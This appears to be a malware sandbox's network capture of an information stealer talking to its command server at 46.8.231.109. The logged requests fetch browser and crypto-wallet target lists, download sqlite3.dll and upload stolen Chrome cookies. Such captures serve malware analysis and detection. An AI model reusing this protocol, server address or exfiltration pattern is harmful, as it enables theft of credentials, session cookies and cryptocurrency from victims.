                                                                                                                                                                                                                                          Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.002120972 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                                                                                                          Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.022973061 CEST466OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 267
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="message"plugins------BFBAAFHDHCBGCAKFHDAK--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202514887 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:06 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 7116
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202565908 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                          Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202577114 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                          Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202586889 CEST672INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                          Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202611923 CEST1236INData Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32
                                                                                                                                                                                                                                          Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202621937 CEST224INData Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44
                                                                                                                                                                                                                                          Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZw
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202677011 CEST1236INData Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44
                                                                                                                                                                                                                                          Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.202785969 CEST268INData Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57
                                                                                                                                                                                                                                          Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.219259024 CEST467OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 268
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"fplugins------DHCAAEBKEGHJKEBFHJDB--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.396033049 CEST335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:06 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 108
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                          Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.415416002 CEST200OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJD
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 7547
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.415467024 CEST7547OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34
                                                                                                                                                                                                                                          Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.710175991 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:06 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.820285082 CEST91OUTGET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.993897915 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:06 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                                                                                                          ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 1106998
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.993927002 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.996108055 CEST950OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 751
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------IDAEBGCAAECAKFHIIJDB--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.198261023 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:08 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:08.287826061 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECF
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
